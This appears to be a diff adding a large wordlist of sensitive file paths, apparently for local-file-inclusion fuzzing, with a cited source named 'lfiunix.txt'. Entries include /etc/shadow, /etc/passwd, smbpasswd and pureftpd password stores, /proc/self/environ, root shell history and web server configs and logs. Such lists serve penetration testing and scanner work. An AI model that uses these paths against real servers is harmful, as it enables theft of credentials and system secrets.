+/etc/ftpchroot +/etc/ftphosts +/etc/ftpusers +/etc/fuse.conf +/etc/group +/etc/group- +/etc/hdparm.conf +/etc/host.conf +/etc/hostname +/etc/hosts +/etc/hosts.allow +/etc/hosts.deny +/etc/http/conf/httpd.conf +/etc/http/httpd.conf +/etc/httpd.conf +/etc/httpd/apache.conf +/etc/httpd/apache2.conf +/etc/httpd/conf +/etc/httpd/conf.d +/etc/httpd/conf.d/php.conf +/etc/httpd/conf.d/squirrelmail.conf +/etc/httpd/conf/apache.conf +/etc/httpd/conf/apache2.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/extra/httpd-ssl.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/access.log +/etc/httpd/logs/access_log +/etc/httpd/logs/error.log +/etc/httpd/logs/error_log +/etc/httpd/mod_php.conf +/etc/httpd/php.ini +/etc/inetd.conf +/etc/init.d +/etc/inittab +/etc/ipfw.conf +/etc/ipfw.rules +/etc/issue +/etc/issue +/etc/issue.net +/etc/kbd/config +/etc/kernel-img.conf +/etc/kernel-pkg.conf +/etc/ld.so.conf +/etc/ldap/ldap.conf +/etc/lighttpd/lighthttpd.conf +/etc/login.defs +/etc/logrotate.conf +/etc/logrotate.d/ftp +/etc/logrotate.d/proftpd +/etc/logrotate.d/vsftpd.log +/etc/ltrace.conf +/etc/mail/sendmail.conf +/etc/mandrake-release +/etc/manpath.config +/etc/miredo-server.conf +/etc/miredo.conf +/etc/miredo/miredo-server.conf +/etc/miredo/miredo.conf +/etc/modprobe.d/vmware-tools.conf +/etc/modules +/etc/mono/1.0/machine.config +/etc/mono/2.0/machine.config +/etc/mono/2.0/web.config +/etc/mono/config +/etc/motd +/etc/motd +/etc/mtab +/etc/mtools.conf +/etc/muddleftpd.com +/etc/muddleftpd/muddleftpd.conf +/etc/muddleftpd/muddleftpd.passwd +/etc/muddleftpd/mudlog +/etc/muddleftpd/mudlogd.conf +/etc/muddleftpd/passwd +/etc/my.cnf +/etc/mysql/conf.d/old_passwords.cnf +/etc/mysql/my.cnf +/etc/networks +/etc/newsyslog.conf +/etc/nginx/nginx.conf +/etc/openldap/ldap.conf +/etc/os-release +/etc/osxhttpd/osxhttpd.conf +/etc/pam.conf +/etc/pam.d/proftpd +/etc/passwd +/etc/passwd +/etc/passwd- +/etc/passwd~ +/etc/password.master +/etc/php.ini +/etc/php/apache/php.ini +/etc/php/apache2/php.ini +/etc/php/cgi/php.ini +/etc/php/php.ini +/etc/php/php4/php.ini +/etc/php4.4/fcgi/php.ini +/etc/php4/apache/php.ini +/etc/php4/apache2/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache/php.ini +/etc/php5/apache2/php.ini +/etc/php5/cgi/php.ini +/etc/phpmyadmin/config.inc.php +/etc/postgresql/pg_hba.conf +/etc/postgresql/postgresql.conf +/etc/profile +/etc/proftp.conf +/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pulse/client.conf +/etc/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/rc.conf +/etc/rc.d/rc.httpd +/etc/redhat-release +/etc/resolv.conf +/etc/resolvconf/update-libc.d/sendmail +/etc/samba/dhcp.conf +/etc/samba/netlogon +/etc/samba/private/smbpasswd +/etc/samba/samba.conf +/etc/samba/smb.conf +/etc/samba/smb.conf.user +/etc/samba/smbpasswd +/etc/samba/smbusers +/etc/security/access.conf +/etc/security/environ +/etc/security/failedlogin +/etc/security/group +/etc/security/group.conf +/etc/security/lastlog +/etc/security/limits +/etc/security/limits.conf +/etc/security/namespace.conf +/etc/security/opasswd +/etc/security/pam_env.conf +/etc/security/passwd +/etc/security/sepermit.conf +/etc/security/time.conf +/etc/security/user +/etc/sensors.conf +/etc/sensors3.conf +/etc/shadow +/etc/shadow- +/etc/shadow~ +/etc/slackware-release +/etc/smb.conf +/etc/smbpasswd +/etc/smi.conf +/etc/squirrelmail/apache.conf +/etc/squirrelmail/config.php +/etc/squirrelmail/config/config.php +/etc/squirrelmail/config_default.php +/etc/squirrelmail/config_local.php +/etc/squirrelmail/default_pref +/etc/squirrelmail/filters_setup.php +/etc/squirrelmail/index.php +/etc/squirrelmail/sqspell_config.php +/etc/ssh/sshd_config +/etc/sso/sso_config.ini +/etc/stunnel/stunnel.conf +/etc/subversion/config +/etc/sudoers +/etc/suse-release +/etc/sw-cp-server/applications.d/00-sso-cpserver.conf +/etc/sw-cp-server/applications.d/plesk.conf +/etc/sysconfig/network-scripts/ifcfg-eth0 +/etc/sysctl.conf +/etc/sysctl.d/10-console-messages.conf +/etc/sysctl.d/10-network-security.conf +/etc/sysctl.d/10-process-security.conf +/etc/sysctl.d/wine.sysctl.conf +/etc/syslog.conf +/etc/timezone +/etc/tinyproxy/tinyproxy.conf +/etc/tor/tor-tsocks.conf +/etc/tsocks.conf +/etc/updatedb.conf +/etc/updatedb.conf.beforevmwaretoolsinstall +/etc/utmp +/etc/vhcs2/proftpd/proftpd.conf +/etc/vmware-tools/config +/etc/vmware-tools/tpvmlp.conf +/etc/vmware-tools/vmware-tools-libraries.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/webmin/miniserv.conf +/etc/webmin/miniserv.users +/etc/wicd/dhclient.conf.template.default +/etc/wicd/manager-settings.conf +/etc/wicd/wired-settings.conf +/etc/wicd/wireless-settings.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/etc/x11/xorg.conf +/etc/x11/xorg.conf-vesa +/etc/x11/xorg.conf-vmware +/etc/x11/xorg.conf.beforevmwaretoolsinstall +/etc/x11/xorg.conf.orig +/home/bin/stable/apache/php.ini +/home/postgres/data/pg_hba.conf +/home/postgres/data/pg_ident.conf +/home/postgres/data/pg_version +/home/postgres/data/postgresql.conf +/home/user/lighttpd/lighttpd.conf +/home2/bin/stable/apache/php.ini +/http/httpd.conf +/library/webserver/documents/.htaccess +/library/webserver/documents/default.htm +/library/webserver/documents/default.html +/library/webserver/documents/default.php +/library/webserver/documents/index.htm +/library/webserver/documents/index.html +/library/webserver/documents/index.php +/logs/access.log +/logs/access_log +/logs/error.log +/logs/error_log +/logs/pure-ftpd.log +/logs/security_debug_log +/logs/security_log +/mysql/bin/my.ini +/mysql/data/mysql-bin.index +/mysql/data/mysql-bin.log +/mysql/data/mysql.err +/mysql/data/mysql.log +/mysql/my.cnf +/mysql/my.ini +/netserver/bin/stable/apache/php.ini +/opt/jboss/server/default/conf/jboss-minimal.xml +/opt/jboss/server/default/conf/jboss-service.xml +/opt/jboss/server/default/conf/jndi.properties +/opt/jboss/server/default/conf/log4j.xml +/opt/jboss/server/default/conf/login-config.xml +/opt/jboss/server/default/conf/server.log.properties +/opt/jboss/server/default/conf/standardjaws.xml +/opt/jboss/server/default/conf/standardjboss.xml +/opt/jboss/server/default/deploy/jboss-logging.xml +/opt/jboss/server/default/log/boot.log +/opt/jboss/server/default/log/server.log +/opt/apache/apache.conf +/opt/apache/apache2.conf +/opt/apache/conf/apache.conf +/opt/apache/conf/apache2.conf +/opt/apache/conf/httpd.conf +/opt/apache2/apache.conf +/opt/apache2/apache2.conf +/opt/apache2/conf/apache.conf +/opt/apache2/conf/apache2.conf +/opt/apache2/conf/httpd.conf +/opt/apache22/conf/httpd.conf +/opt/httpd/apache.conf +/opt/httpd/apache2.conf +/opt/httpd/conf/apache.conf +/opt/httpd/conf/apache2.conf +/opt/lampp/etc/httpd.conf +/opt/lampp/logs/access.log +/opt/lampp/logs/access_log +/opt/lampp/logs/error.log +/opt/lampp/logs/error_log +/opt/lsws/conf/httpd_conf.xml +/opt/lsws/logs/access.log +/opt/lsws/logs/error.log +/opt/tomcat/logs/catalina.err +/opt/tomcat/logs/catalina.out +/opt/xampp/etc/php.ini +/opt/xampp/logs/access.log +/opt/xampp/logs/access_log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log +/php/php.ini +/php/php.ini +/php4/php.ini +/php5/php.ini +/postgresql/log/pgadmin.log +/private/etc/httpd/apache.conf +/private/etc/httpd/apache2.conf +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/private/etc/squirrelmail/config/config.php +/proc/cpuinfo +/proc/devices +/proc/meminfo +/proc/net/tcp +/proc/net/udp +/proc/self/cmdline +/proc/self/environ +/proc/self/environ +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/10 +/proc/self/fd/11 +/proc/self/fd/12 +/proc/self/fd/13 +/proc/self/fd/14 +/proc/self/fd/15 +/proc/self/fd/2 +/proc/self/fd/3 +/proc/self/fd/4 +/proc/self/fd/5 +/proc/self/fd/6 +/proc/self/fd/7 +/proc/self/fd/8 +/proc/self/fd/9 +/proc/self/mounts +/proc/self/stat +/proc/self/status +/proc/version +/program files/jboss/server/default/conf/jboss-minimal.xml +/program files/jboss/server/default/conf/jboss-service.xml +/program files/jboss/server/default/conf/jndi.properties +/program files/jboss/server/default/conf/log4j.xml +/program files/jboss/server/default/conf/login-config.xml +/program files/jboss/server/default/conf/server.log.properties +/program files/jboss/server/default/conf/standardjaws.xml +/program files/jboss/server/default/conf/standardjboss.xml +/program files/jboss/server/default/deploy/jboss-logging.xml +/program files/jboss/server/default/log/boot.log +/program files/jboss/server/default/log/server.log +/program files/apache group/apache/apache.conf +/program files/apache group/apache/apache2.conf +/program files/apache group/apache/conf/apache.conf +/program files/apache group/apache/conf/apache2.conf +/program files/apache group/apache/conf/httpd.conf +/program files/apache group/apache/logs/access.log +/program files/apache group/apache/logs/error.log +/program files/apache group/apache2/conf/apache.conf +/program files/apache group/apache2/conf/apache2.conf +/program files/apache group/apache2/conf/httpd.conf +/program files/apache software foundation/apache2.2/conf/httpd.conf +/program files/apache software foundation/apache2.2/logs/access.log +/program files/apache software foundation/apache2.2/logs/error.log +/program files/mysql/data/mysql-bin.index +/program files/mysql/data/mysql-bin.log +/program files/mysql/data/mysql.err +/program files/mysql/data/mysql.log +/program files/mysql/my.cnf +/program files/mysql/my.ini +/program files/mysql/mysql server 5.0/data/mysql-bin.index +/program files/mysql/mysql server 5.0/data/mysql-bin.log +/program files/mysql/mysql server 5.0/data/mysql.err +/program files/mysql/mysql server 5.0/data/mysql.log +/program files/mysql/mysql server 5.0/my.cnf +/program files/mysql/mysql server 5.0/my.ini +/program files/postgresql/8.3/data/pg_hba.conf +/program files/postgresql/8.3/data/pg_ident.conf +/program files/postgresql/8.3/data/postgresql.conf +/program files/postgresql/8.4/data/pg_hba.conf +/program files/postgresql/8.4/data/pg_ident.conf +/program files/postgresql/8.4/data/postgresql.conf +/program files/postgresql/9.0/data/pg_hba.conf +/program files/postgresql/9.0/data/pg_ident.conf +/program files/postgresql/9.0/data/postgresql.conf +/program files/postgresql/9.1/data/pg_hba.conf +/program files/postgresql/9.1/data/pg_ident.conf +/program files/postgresql/9.1/data/postgresql.conf +/program files/vidalia bundle/polipo/polipo.conf +/program files/xampp/apache/conf/apache.conf +/program files/xampp/apache/conf/apache2.conf +/program files/xampp/apache/conf/httpd.conf +/root/.bash_config +/root/.bash_history +/root/.bash_logout +/root/.bashrc +/root/.ksh_history +/root/.xauthority +/srv/www/htdos/squirrelmail/config/config.php +/ssl_request_log +/system/library/webobjects/adaptors/apache2.2/apache.conf +/temp/sess_ +/thttpd_log +/tmp/jboss/server/default/conf/jboss-minimal.xml +/tmp/jboss/server/default/conf/jboss-service.xml +/tmp/jboss/server/default/conf/jndi.properties +/tmp/jboss/server/default/conf/log4j.xml +/tmp/jboss/server/default/conf/login-config.xml +/tmp/jboss/server/default/conf/server.log.properties +/tmp/jboss/server/default/conf/standardjaws.xml +/tmp/jboss/server/default/conf/standardjboss.xml +/tmp/jboss/server/default/deploy/jboss-logging.xml +/tmp/jboss/server/default/log/boot.log +/tmp/jboss/server/default/log/server.log +/tmp/access.log +/tmp/sess_ +/usr/apache/conf/httpd.conf +/usr/apache2/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/home/user/lighttpd/lighttpd.conf +/usr/home/user/var/log/apache.log +/usr/home/user/var/log/lighttpd.error.log +/usr/internet/pgsql/data/pg_hba.conf +/usr/internet/pgsql/data/postmaster.log +/usr/lib/cron/log +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/jboss/server/default/conf/jboss-minimal.xml +/usr/local/jboss/server/default/conf/jboss-service.xml +/usr/local/jboss/server/default/conf/jndi.properties +/usr/local/jboss/server/default/conf/log4j.xml +/usr/local/jboss/server/default/conf/login-config.xml +/usr/local/jboss/server/default/conf/server.log.properties +/usr/local/jboss/server/default/conf/standardjaws.xml +/usr/local/jboss/server/default/conf/standardjboss.xml +/usr/local/jboss/server/default/deploy/jboss-logging.xml +/usr/local/jboss/server/default/log/boot.log +/usr/local/jboss/server/default/log/server.log +/usr/local/apache/apache.conf +/usr/local/apache/apache2.conf +/usr/local/apache/conf/access.conf +/usr/local/apache/conf/apache.conf +/usr/local/apache/conf/apache2.conf +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/httpd.conf.default +/usr/local/apache/conf/modsec.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/conf/vhosts-custom.conf +/usr/local/apache/conf/vhosts.conf +/usr/local/apache/httpd.conf +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access_log +/usr/local/apache/logs/audit_log +/usr/local/apache/logs/error.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/lighttpd.error.log +/usr/local/apache/logs/lighttpd.log +/usr/local/apache/logs/mod_jk.log +/usr/local/apache1.3/conf/httpd.conf +/usr/local/apache2/apache.conf +/usr/local/apache2/apache2.conf +/usr/local/apache2/conf/apache.conf +/usr/local/apache2/conf/apache2.conf +/usr/local/apache2/conf/extra/httpd-ssl.conf +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/conf/modsec.conf +/usr/local/apache2/conf/ssl.conf +/usr/local/apache2/conf/vhosts-custom.conf +/usr/local/apache2/conf/vhosts.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/audit_log +/usr/local/apache2/logs/error.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/lighttpd.error.log +/usr/local/apache2/logs/lighttpd.log +/usr/local/apache22/conf/httpd.conf +/usr/local/apache22/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache22/conf/httpd.conf +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache2/httpd.conf +/usr/local/etc/apache2/vhosts.conf +/usr/local/etc/apache22/conf/httpd.conf +/usr/local/etc/apache22/httpd.conf +/usr/local/etc/httpd/conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/lighttpd.conf +/usr/local/etc/lighttpd.conf.new +/usr/local/etc/nginx/nginx.conf +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/etc/smb.conf +/usr/local/etc/webmin/miniserv.conf +/usr/local/etc/webmin/miniserv.users +/usr/local/httpd/conf/httpd.conf +/usr/local/jakarta/dist/tomcat/conf/context.xml +/usr/local/jakarta/dist/tomcat/conf/jakarta.conf +/usr/local/jakarta/dist/tomcat/conf/logging.properties +/usr/local/jakarta/dist/tomcat/conf/server.xml +/usr/local/jakarta/dist/tomcat/conf/workers.properties +/usr/local/jakarta/dist/tomcat/logs/mod_jk.log +/usr/local/jakarta/tomcat/conf/context.xml +/usr/local/jakarta/tomcat/conf/jakarta.conf +/usr/local/jakarta/tomcat/conf/logging.properties +/usr/local/jakarta/tomcat/conf/server.xml +/usr/local/jakarta/tomcat/conf/workers.properties +/usr/local/jakarta/tomcat/logs/catalina.err +/usr/local/jakarta/tomcat/logs/catalina.out +/usr/local/jakarta/tomcat/logs/mod_jk.log +/usr/local/lib/php.ini +/usr/local/lighttpd/conf/lighttpd.conf +/usr/local/lighttpd/log/access.log +/usr/local/lighttpd/log/lighttpd.error.log +/usr/local/logs/access.log +/usr/local/logs/samba.log +/usr/local/lsws/conf/httpd_conf.xml +/usr/local/lsws/logs/error.log +/usr/local/mysql/data/mysql-bin.index +/usr/local/mysql/data/mysql-bin.log +/usr/local/mysql/data/mysql-slow.log +/usr/local/mysql/data/mysql.err +/usr/local/mysql/data/mysql.log +/usr/local/mysql/data/mysqlderror.log +/usr/local/nginx/conf/nginx.conf +/usr/local/pgsql/bin/pg_passwd +/usr/local/pgsql/data/passwd +/usr/local/pgsql/data/pg_hba.conf +/usr/local/pgsql/data/pg_log +/usr/local/pgsql/data/postgresql.conf +/usr/local/pgsql/data/postgresql.log +/usr/local/php/apache.conf +/usr/local/php/apache.conf.php +/usr/local/php/apache2.conf +/usr/local/php/apache2.conf.php +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/php4/apache.conf +/usr/local/php4/apache.conf.php +/usr/local/php4/apache2.conf +/usr/local/php4/apache2.conf.php +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/apache.conf +/usr/local/php5/apache.conf.php +/usr/local/php5/apache2.conf +/usr/local/php5/apache2.conf.php +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/psa/admin/conf/php.ini +/usr/local/psa/admin/conf/site_isolation_settings.ini +/usr/local/psa/admin/htdocs/domains/databases/phpmyadmin/libraries/config.default.php +/usr/local/psa/admin/logs/httpsd_access_log +/usr/local/psa/admin/logs/panel.log +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/samba/lib/log.user +/usr/local/samba/lib/smb.conf.user +/usr/local/sb/config +/usr/local/squirrelmail/www/readme +/usr/local/zend/etc/php.ini +/usr/local/zeus/web/global.cfg +/usr/local/zeus/web/log/errors +/usr/pkg/etc/httpd/httpd-default.conf +/usr/pkg/etc/httpd/httpd-vhosts.conf +/usr/pkg/etc/httpd/httpd.conf +/usr/pkgsrc/net/pureftpd/pure-ftpd.conf +/usr/pkgsrc/net/pureftpd/pureftpd.passwd +/usr/pkgsrc/net/pureftpd/pureftpd.pdb +/usr/ports/contrib/pure-ftpd/pure-ftpd.conf +/usr/ports/contrib/pure-ftpd/pureftpd.passwd +/usr/ports/contrib/pure-ftpd/pureftpd.pdb +/usr/ports/ftp/pure-ftpd/pure-ftpd.conf +/usr/ports/ftp/pure-ftpd/pureftpd.passwd +/usr/ports/ftp/pure-ftpd/pureftpd.pdb +/usr/ports/net/pure-ftpd/pure-ftpd.conf +/usr/ports/net/pure-ftpd/pureftpd.passwd +/usr/ports/net/pure-ftpd/pureftpd.pdb +/usr/sbin/mudlogd +/usr/sbin/mudpasswd +/usr/sbin/pure-config.pl +/usr/share/adduser/adduser.conf +/usr/share/logs/catalina.err +/usr/share/logs/catalina.out +/usr/share/squirrelmail/config/config.php +/usr/share/squirrelmail/plugins/squirrel_logger/setup.php +/usr/share/tomcat/logs/catalina.err +/usr/share/tomcat/logs/catalina.out +/usr/share/tomcat6/conf/context.xml +/usr/share/tomcat6/conf/logging.properties +/usr/share/tomcat6/conf/server.xml +/usr/share/tomcat6/conf/workers.properties +/usr/share/tomcat6/logs/catalina.err +/usr/share/tomcat6/logs/catalina.out +/usr/spool/lp/log +/usr/spool/mqueue/syslog +/var/adm/acct/sum/loginlog +/var/adm/aculog +/var/adm/aculogs +/var/adm/crash/unix +/var/adm/crash/vmcore +/var/adm/cron/log +/var/adm/dtmp +/var/adm/lastlog/username +/var/adm/log/asppp.log +/var/adm/log/xferlog +/var/adm/loginlog +/var/adm/lp/lpd-errs +/var/adm/messages +/var/adm/pacct +/var/adm/qacct +/var/adm/ras/bootlog +/var/adm/ras/errlog +/var/adm/sulog +/var/adm/syslog +/var/adm/utmp +/var/adm/utmpx +/var/adm/vold.log +/var/adm/wtmp +/var/adm/wtmpx +/var/adm/x0msgs +/var/apache/conf/httpd.conf +/var/cpanel/cpanel.config +/var/cpanel/tomcat.options +/var/cron/log +/var/data/mysql-bin.index +/var/lib/mysql/my.cnf +/var/lib/pgsql/data/postgresql.conf +/var/lib/squirrelmail/prefs/squirrelmail.log +/var/lighttpd.log +/var/local/www/conf/php.ini +/var/log/access.log +/var/log/access_log +/var/log/apache/access.log +/var/log/apache/access_log +/var/log/apache/error.log +/var/log/apache/error_log +/var/log/apache2/access.log +/var/log/apache2/access_log +/var/log/apache2/error.log +/var/log/apache2/error_log +/var/log/apache2/squirrelmail.err.log +/var/log/apache2/squirrelmail.log +/var/log/auth.log +/var/log/auth.log +/var/log/authlog +/var/log/boot.log +/var/log/cron/var/log/postgres.log +/var/log/daemon.log +/var/log/daemon.log.1 +/var/log/data/mysql-bin.index +/var/log/error.log +/var/log/error_log +/var/log/exim/mainlog +/var/log/exim/paniclog +/var/log/exim/rejectlog +/var/log/exim_mainlog +/var/log/exim_paniclog +/var/log/exim_rejectlog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/ftplog +/var/log/httpd/access.log +/var/log/httpd/access_log +/var/log/httpd/error.log +/var/log/httpd/error_log +/var/log/ipfw +/var/log/ipfw.log +/var/log/ipfw.today +/var/log/ipfw/ipfw.log +/var/log/kern.log +/var/log/kern.log.1 +/var/log/lighttpd.access.log +/var/log/lighttpd.error.log +/var/log/lighttpd/access.log +/var/log/lighttpd/access.www.log +/var/log/lighttpd/error.log +/var/log/lighttpd/error.www.log +/var/log/log.smb +/var/log/mail.err +/var/log/mail.info +/var/log/mail.log +/var/log/mail.log +/var/log/mail.warn +/var/log/maillog +/var/log/messages +/var/log/messages.1 +/var/log/muddleftpd +/var/log/muddleftpd.conf +/var/log/mysql-bin.index +/var/log/mysql.err +/var/log/mysql.log +/var/log/mysql/data/mysql-bin.index +/var/log/mysql/mysql-bin.index +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql-slow.log +/var/log/mysql/mysql.log +/var/log/mysqlderror.log +/var/log/news.all +/var/log/news/news.all +/var/log/news/news.crit +/var/log/news/news.err +/var/log/news/news.notice +/var/log/news/suck.err +/var/log/news/suck.notice +/var/log/nginx.access_log +/var/log/nginx.error_log +/var/log/nginx/access.log +/var/log/nginx/access_log +/var/log/nginx/error.log +/var/log/nginx/error_log +/var/log/pgsql/pgsql.log +/var/log/pgsql8.log +/var/log/pgsql_log +/var/log/pm-powersave.log +/var/log/poplog +/var/log/postgres/pg_backup.log +/var/log/postgres/postgres.log +/var/log/postgresql.log +/var/log/postgresql/main.log +/var/log/postgresql/postgres.log +/var/log/postgresql/postgresql-8.1-main.log +/var/log/postgresql/postgresql-8.3-main.log +/var/log/postgresql/postgresql-8.4-main.log +/var/log/postgresql/postgresql-9.0-main.log +/var/log/postgresql/postgresql-9.1-main.log +/var/log/postgresql/postgresql.log +/var/log/proftpd +/var/log/proftpd.access_log +/var/log/proftpd.xferlog +/var/log/proftpd/xferlog.legacy +/var/log/pure-ftpd/pure-ftpd.log +/var/log/pureftpd.log +/var/log/samba.log +/var/log/samba.log1 +/var/log/samba.log2 +/var/log/samba/log.nmbd +/var/log/samba/log.smbd +/var/log/squirrelmail.log +/var/log/sso/sso.log +/var/log/sw-cp-server/error_log +/var/log/syslog +/var/log/syslog.1 +/var/log/thttpd_log +/var/log/tomcat6/catalina.out +/var/log/ufw.log +/var/log/user.log +/var/log/user.log.1 +/var/log/vmware/hostd-1.log +/var/log/vmware/hostd.log +/var/log/vsftpd.log +/var/log/webmin/miniserv.log +/var/log/xferlog +/var/log/xorg.0.log +/var/logs/access.log +/var/lp/logs/lpnet +/var/lp/logs/lpsched +/var/lp/logs/requests +/var/mysql-bin.index +/var/mysql.log +/var/nm2/postgresql.conf +/var/postgresql/db/postgresql.conf +/var/postgresql/log/postgresql.log +/var/saf/_log +/var/saf/port/log +/var/www/.lighttpdpassword +/var/www/conf +/var/www/conf/httpd.conf +/var/www/html/squirrelmail-1.2.9/config/config.php +/var/www/html/squirrelmail/config/config.php +/var/www/logs/access.log +/var/www/logs/access_log +/var/www/logs/error.log +/var/www/logs/error_log +/var/www/squirrelmail/config/config.php +/volumes/macintosh_hd1/opt/apache/conf/httpd.conf +/volumes/macintosh_hd1/opt/apache2/conf/httpd.conf +/volumes/macintosh_hd1/opt/httpd/conf/httpd.conf +/volumes/macintosh_hd1/usr/local/php/httpd.conf.php +/volumes/macintosh_hd1/usr/local/php/lib/php.ini +/volumes/macintosh_hd1/usr/local/php4/httpd.conf.php +/volumes/macintosh_hd1/usr/local/php5/httpd.conf.php +/volumes/webbackup/opt/apache2/conf/httpd.conf +/volumes/webbackup/private/etc/httpd/httpd.conf +/volumes/webbackup/private/etc/httpd/httpd.conf.default +/wamp/bin/apache/apache2.2.21/conf/httpd.conf +/wamp/bin/apache/apache2.2.21/logs/access.log +/wamp/bin/apache/apache2.2.21/logs/error.log +/wamp/bin/apache/apache2.2.21/wampserver.conf +/wamp/bin/apache/apache2.2.22/conf/httpd.conf +/wamp/bin/apache/apache2.2.22/conf/wampserver.conf +/wamp/bin/apache/apache2.2.22/logs/access.log +/wamp/bin/apache/apache2.2.22/logs/error.log +/wamp/bin/apache/apache2.2.22/wampserver.conf +/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index +/wamp/bin/mysql/mysql5.5.16/my.ini +/wamp/bin/mysql/mysql5.5.16/wampserver.conf +/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index +/wamp/bin/mysql/mysql5.5.24/my.ini +/wamp/bin/mysql/mysql5.5.24/wampserver.conf +/wamp/bin/php/php5.3.8/php.ini +/wamp/bin/php/php5.4.3/php.ini +/wamp/logs/access.log +/wamp/logs/apache_error.log +/wamp/logs/genquery.log +/wamp/logs/mysql.log +/wamp/logs/slowquery.log +/web/conf/php.ini +/windows/comsetup.log +/windows/debug/netsetup.log +/windows/odbc.ini +/windows/php.ini +/windows/repair/setup.log +/windows/setupact.log +/windows/setupapi.log +/windows/setuperr.log +/windows/win.ini +/windows/system32/drivers/etc/hosts +/windows/system32/drivers/etc/lmhosts.sam +/windows/system32/drivers/etc/networks +/windows/system32/drivers/etc/protocol +/windows/system32/drivers/etc/services +/windows/system32/logfiles/firewall/pfirewall.log +/windows/system32/logfiles/firewall/pfirewall.log.old +/windows/system32/logfiles/msftpsvc +/windows/system32/logfiles/msftpsvc1 +/windows/system32/logfiles/msftpsvc2 +/windows/system32/logfiles/smtpsvc +/windows/system32/logfiles/smtpsvc1 +/windows/system32/logfiles/smtpsvc2 +/windows/system32/logfiles/smtpsvc3 +/windows/system32/logfiles/smtpsvc4 +/windows/system32/logfiles/smtpsvc5 +/windows/system32/logfiles/w3svc/inetsvn1.log +/windows/system32/logfiles/w3svc1/inetsvn1.log +/windows/system32/logfiles/w3svc2/inetsvn1.log +/windows/system32/logfiles/w3svc3/inetsvn1.log +/windows/system32/macromed/flash/flashinstall.log +/windows/system32/macromed/flash/install.log +/windows/updspapi.log +/windows/windowsupdate.log +/windows/wmsetup.log +/winnt/php.ini +/winnt/system32/logfiles/firewall/pfirewall.log +/winnt/system32/logfiles/firewall/pfirewall.log.old +/winnt/system32/logfiles/msftpsvc +/winnt/system32/logfiles/msftpsvc1 +/winnt/system32/logfiles/msftpsvc2 +/winnt/system32/logfiles/smtpsvc +/winnt/system32/logfiles/smtpsvc1 +/winnt/system32/logfiles/smtpsvc2 +/winnt/system32/logfiles/smtpsvc3 +/winnt/system32/logfiles/smtpsvc4 +/winnt/system32/logfiles/smtpsvc5 +/winnt/system32/logfiles/w3svc/inetsvn1.log +/winnt/system32/logfiles/w3svc1/inetsvn1.log +/winnt/system32/logfiles/w3svc2/inetsvn1.log +/winnt/system32/logfiles/w3svc3/inetsvn1.log +/www/apache/conf/httpd.conf +/www/conf/httpd.conf +/www/logs/freebsddiary-access_log +/www/logs/freebsddiary-error.log +/www/logs/proftpd.system.log +/xampp/apache/bin/php.ini +/xampp/apache/conf/httpd.conf +/xampp/apache/logs/access.log +/xampp/apache/logs/error.log +/xampp/filezillaftp/filezilla server.xml +/xampp/htdocs/aca.txt +/xampp/htdocs/admin.php +/xampp/htdocs/leer.txt +/xampp/mercurymail/mercury.ini +/xampp/mysql/data/mysql-bin.index +/xampp/mysql/data/mysql.err +/xampp/php/php.ini +/xampp/phpmyadmin/config.inc.php +/xampp/sendmail/sendmail.ini +/xampp/sendmail/sendmail.log +/xampp/webalizer/webalizer.conf +\autoexec.bat +\boot.ini +\inetpub\wwwroot\web.config +\web.config +\windows\system32\drivers\etc\hosts +\windows\win.ini + +# Reference: https://repo.theoremforge.com/pentesting/tools/blob/0f1f0578739870b633c267789120d85982545a69/Uncategorized/Dump/lfiunix.txt + +/etc/apache2/.htpasswd +/etc/apache/.htpasswd +/etc/master.passwd +/etc/muddleftpd/muddleftpd.passwd +/etc/muddleftpd/passwd +/etc/passwd +/etc/passwd~ +/etc/passwd- +/etc/pureftpd.passwd +/etc/samba/private/smbpasswd +/etc/samba/smbpasswd +/etc/security/opasswd +/etc/security/passwd +/etc/smbpasswd +\Program Files\xampp\apache\conf\httpd.conf 